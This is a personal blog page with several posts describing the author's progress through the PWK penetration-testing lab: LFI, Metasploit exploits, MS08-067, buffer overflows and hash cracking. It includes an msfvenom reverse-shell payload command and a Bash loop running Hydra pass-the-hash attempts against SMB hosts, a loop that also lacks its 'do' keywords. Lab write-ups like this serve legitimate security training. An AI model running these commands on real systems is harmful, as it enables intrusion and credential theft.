- Personal website of Thomas Sluyter

Unimportant background
  RSS feed

About me

Blog archives















> Weblog

> Sysadmin articles

> Maths teaching

The fifth host was a fun one!

2017-03-18 16:52:00

Dot Warner

For those wondering about the seemingly random images with my recent blog posts: they're hints about the relevant host(s) in the PWK labs of Offensive Security. My fifth host was the always adorable Warner sister. 

This was a fun one! My recon consisted of simultaneous Nmap and Nikto scans, both uncovering a few fun things. What caught my eye was the silly 404 image used on the main web server, so I turned to Nikto's results first. It had uncovered both an phpLiteAdmin and a Cuppa CMS install. Both offered interesting possibilities, respectively the uploading of code and the potentia for LFI or RFI. Together, they offered me the opportunity to practice with PHP shellcode, followed by local privilege escallation. Fun and games! tags: , , ,

View or add comments (curr. 0)

Four hosts down, sort of

2017-03-15 21:12:00

Tophat! The indisputable leader of the gang!

I've taken a short break from the PWK labs, due to family business. Right before the break I managed to root a host running a specific database platform. I've gathered all the evidence, but the most frustrating thing is that, as you may have read, I can no longer reproduce the break-in!

The fourth host was apparently one of the easier ones in the labs, with many folks on the OffSec forums being about as cordial as the average League or CS:GO player. "Most simplest in the list it took only 15 minutes :p" "omw, enumerate and 15 seconds later done and dusted"

After confirming my ideas about the host with an automated attack in Metasploit, I proceeded to reproduce the attack manually. ExploitDB has a readymade C program that exploits the vulnerability to provide a remote shell. GCC initially refused to compile, because one locally defined function macro required an unloaded library. I'm glad that GCC provided the exact hint that got me on my way :) I've made sure to submit the bugfix to ExploitDB through Github, making it my second fix for EDB! :D

That's four boxes popped and explored. After gaining root on each host, I spend a lot of time combing through files, email boxes and databases, scouring for good hints. All the password hashes get run through hashcat or NTLM Cracker, to attempt lateral movement. 

To quote the Mickey-D's commercials: I'm lovin'it! tags: , , ,

View or add comments (curr. 0)

Frustration, thy name is reproducability

2017-03-13 21:41:00

On March 2nd, I managed to get into one particular box in the PWK labs using an exploit in MSF. Meterpreter ran and I managed to snag the hash from proof.txt and to dig around a bit more. 

Coming back an hour later, the exploit fails and crashes the target service. No amount of reverting returns the host to such a state that the exploit works. Oh frustration, thy name be reproducability! I discussed the situation with help@offsec and they confirm that the host is working as it should, suggesting that I try to improve my network connection by dropping the VPN's MTU a bit. 

I can only imagine that the one time the exploit worked, one of the other students had done something to the target that rendered it susceptible. Right then... Back to the drawing board! tags: , , ,

View or add comments (curr. 0)

CISSP certs now come with a spiffy giftbox

2017-03-01 17:10:00

When I renewed my CISSP status a few weeks ago, I knew I'd be getting a new membership card in the mail. What I didn't expect however, was to get a swanky giftbox with a nice presentation of the cert, card and a pin! Looking classy there, ISC2 :) tags: ,

View or add comments (curr. 0)

PWK labs: the second host falls

2017-02-28 21:35:00

juvenile delinquents

Wow, this has been a long while in coming, but I've finally pwned my second box in the PWK labs. It's been a few weeks, between finishing the course book exercises, recovering from a short illness and slacking off to "The 100" (thanks for introducing me to the show Mike!).

My second host caught my eye during the exercises in chapter 14, where we're doing password and hash attacks on Windows boxen. The hostname reminds me of juvy gangs, hence the book cover on the left. :D

The book asks us to use Metasploit to exploit one of the SMB servers, in order to grab a hashdump through Meterpreter. One of those servers stood out, as it could fall prey to the famous MS08-067. Because it's such a well-known bug, I wanted to replicate the attack manually instead of just using Metasploit. Not literally "manually", because I can't code that well, but by tweaking one of the pre-existing POCs such as or

It got frustrating and I bumped my head quite a few times, only to finally find out what I was doing wrong by reading a suggestion on the OffSec forums: 

"Well, consider how the malicious packet in 7132 is created, and where exactly the shellcode is inserted. If a shellcode of different size is substituted, how would that affect the rest of the items in the malicious packet?"

I hadn't accounted for my smaller payload size, which would mess up the execution of the whole exploit! After recalculating the NOP slide it was clear sailing and I now have admin on the box. 

I'm not satisfied though! I see the host is also vulnerable to another famous bug from 2005, which I've already confirmed with Metasploit. Now I want to make the relevant POC C-code also work in my situation :) This is fun stuff! tags: , , , ,

View or add comments (curr. 0)

Quick connection checks in Bash

2017-02-24 16:27:00

I can't believe it took me at least four years to learn about Bash's built-in Netcat equivalent /dev/tcp. And I really can't believe it took me even longer than that to learn about Bash's timeout command!

Today I'm attempting pass-the-hash attacks on the SMB hosts in the PWK labs. After trying a few different approaches, I've settled on using Hydra to test the hashes. The downside is that Hydra can sometimes get stuck in these "child terminated, cannot connect" loops when the SMB target can't be reached. To prevent that, I'm testing the connection with Bash's /dev/tcp, which has the downside that it may also get stuck in long waiting periods if the target isn't responding correctly. Enter timeout, stage left!

for IP in $(cat smb-hosts.txt | cut -f2)
	timeout 10 bash -c "echo > /dev/tcp/${IP}/445"
	[[ $? -gt 0 ]] && continue

	cat hashdump2.txt | tr ':' ' ' | while read USER IDNUM HSH1 HSH2
	  echo "============================"
	  echo "Testing ${USER} at ${IP}"
	  hydra -l ${USER} -p ${HSH1}:${HSH2} ${IP} -m "LocalHash" smb -w 5 -t 1
done tags: , ,

View or add comments (curr. 0)

Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I have a shaky understanding of the output sizing displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 

Learning points that I should look into: tags: , , ,

View or add comments (curr. 0)

PWK Labs: the first host falls

2017-01-29 20:41:00

Hotline Miami 2 logo

I thought I'd get a quick start on doing recon on the PWK labs. Using various enumeration and scanning techniques I've so far found 46 of the 50 hosts I expect to be in the public network. Beyond that, we'll see. For now, I wanted to get started on at least one box. One stood out:, which was found to have no less than ten open services. That looks promising!

It was a lot of fun, exploring that box! What started with a simple credentials issue, led me down the rabbit hole of multi-application LFI. Where I got within inches of the goal using my own approach I did not manage to leap that final hurdle. Some more research led me to an alternative approach of the same category, which flawlessly led to a shell. After that, the host was rife with configuration issues that led to privesc. 

Onwards! I need to dig deeper into this box, to see what more I can find :) tags: , , , ,

View or add comments (curr. 1)

Older blog posts